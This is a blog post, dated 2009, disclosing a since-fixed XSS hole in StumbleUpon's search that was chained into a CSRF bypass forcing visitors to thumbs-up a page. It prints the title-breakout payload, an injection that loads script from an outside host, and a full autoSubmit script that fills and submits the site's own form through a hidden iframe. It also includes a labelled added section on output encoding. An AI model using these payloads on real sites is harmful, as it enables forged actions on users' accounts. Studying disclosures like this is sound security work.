Details of StumbleUpon Hack Released

Sat, 28 Feb 09 15:42:51 -0700

A few months ago, I located an XSS vulnerability in StumbleUpon.com and developed an exploit for it: an XSS-driven CSRF ("XSSRF") that gives a page an automatic thumbs-up.

The idea: properly executed, the exploit makes anyone who visits the rigged page automatically give a page of the attacker's choosing a "Thumbs Up."

I reported the flaw, and the system has been fixed. You know what that means... I get to publish and brag.

The primary XSS hole was in the StumbleUpon.com search engine: the search term was reflected, unencoded, inside the page's <title> element (hence the leading </title> in the payload), so an injection of </title><script>alert('proof of concept')</script> closed the title early and ran the script. Positive result.
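
Why that payload has to open with </title>, as an added illustration that is not code from the original post or from StumbleUpon: the two templates below are assumptions standing in for the real search page (the body reflection is assumed to have been encoded already, the title one missed), and the payload strings are constructed here.

```javascript
// Added example, not StumbleUpon's code. The templates are assumed; the
// only thing taken from the write-up is the payload shape.

function escapeHtml(s) {
    return String(s).replace(/[&<>"']/g, function (c) {
        return { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                 '"': '&quot;', "'": '&#39;' }[c];
    });
}

// Vulnerable rendering (assumed): the body reflection was encoded, but the
// raw query is concatenated straight into <title>.
function renderSearchPageUnsafe(query) {
    return '<html><head><title>Search: ' + query + ' - StumbleUpon</title></head>' +
           '<body><h1>Results for ' + escapeHtml(query) + '</h1></body></html>';
}

// Hardened rendering: the query is HTML-encoded at every reflection point.
function renderSearchPageSafe(query) {
    var q = escapeHtml(query);
    return '<html><head><title>Search: ' + q + ' - StumbleUpon</title></head>' +
           '<body><h1>Results for ' + q + '</h1></body></html>';
}

// The check a tester would make: does a <script start anywhere after the
// first </title>? Inside <title> the browser treats markup as text (RCDATA),
// so a bare <script> there never runs; the title element has to be closed
// first, which is exactly what the leading </title> in the payload does.
function scriptReachesHtmlContext(html) {
    var lower = html.toLowerCase();
    var close = lower.indexOf('</title>');
    if (close < 0) return false;
    return lower.indexOf('<script', close) >= 0;
}

// Constructed inputs for the demonstration.
var PROOF_OF_CONCEPT = "</title><script>alert('proof of concept')</script>";
var NAIVE_PAYLOAD = "<script>alert('proof of concept')</script>";

console.log(scriptReachesHtmlContext(renderSearchPageUnsafe(PROOF_OF_CONCEPT))); // true
console.log(scriptReachesHtmlContext(renderSearchPageUnsafe(NAIVE_PAYLOAD)));    // false
console.log(scriptReachesHtmlContext(renderSearchPageSafe(PROOF_OF_CONCEPT)));   // false
```

The middle case is the instructive one: the same script tag without the </title> prefix lands inside the title text and stays inert, which is why a tester who only tries a bare <script> in a title-reflected parameter can miss the bug. Encoding the reflection turns the closing tag into &lt;/title&gt; and the breakout disappears.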

So, I decided to see how far I could take the exploit, in theory.

I knew that there were pages with a "Thumbs Up This Page" link on them, but I had never tried it, so I clicked the link and it brought me to a page like this: http://www.stumbleupon.com/submit?url=http%3A%2F%2Fhumanbagel.com%2Fblog.php&title=StumbleUpon.com+Hack+Closed

Looking at the source code, the form carries a hidden input, 'ftoken', whose value is a random hash. That value must match the value stored in the session for the submission to be accepted. Fairly standard CSRF protection, and fairly effective too: a page on another origin cannot read the token, so it cannot forge the request.

But with an XSS hole in the same origin, a remote script and a little crafty scripting, I can place a hidden iframe on the search page pointing at the form page, then have the script fill in the tag and review inputs and submit the form.

The CSRF protection is rendered useless: their own form was used exactly as intended, token and all, except that JavaScript filled the inputs and submitted it. A token only proves the request came from the site's own page, and an injected script runs in the site's own page. The perfect crime.

The script I used (modified for demonstration purposes):

    function autoSubmit(url, fnum, fn, inputs) {
        // Runs once the injected search page has finished loading.
        window.onload = function() {
            var done = false;

            // Hidden iframe pointing at the real /submit form. It is the same
            // origin as the injected page, so the script can read and drive it.
            var ifr = document.createElement("iframe");
            ifr.src = url;
            ifr.setAttribute("id", "framimo");
            ifr.style.display = "none";
            document.body.appendChild(ifr);

            // Once the form page is in the frame, fill it in and submit it.
            // The server-issued ftoken is already sitting in its hidden input,
            // so the CSRF check passes.
            function myload() {
                if (done) return;   // both onload hooks below may fire
                done = true;
                var doc = window.frames[fnum].document;
                var form = doc.forms[fn];
                for (var name in inputs) {
                    form.elements[name].value = inputs[name];
                }
                form.submit();
            }

            ifr.onload = function() { myload(); };                 // good browsers
            window.frames[fnum].onload = function() { myload(); }; // IE
        };
    }

    autoSubmit('/submit?url=http%3A%2F%2Fhumanbagel.com%2Fblog.php&title=StumbleUpon.com+Hack+Closed',
        1, 1,
        {tagnames: 'programming, hacking, stumbleupon, human bagel',
         newcomment: 'Asshole hacked stumbleupon and didnt tell us until the problem was fixed'});


The specific injection was:
</title><script src="http://[domain]/file.js"></script>

I would like to clearly state that the only time I used this exploit was to test it and when I submitted the security report. I never used it on anyone unsuspecting.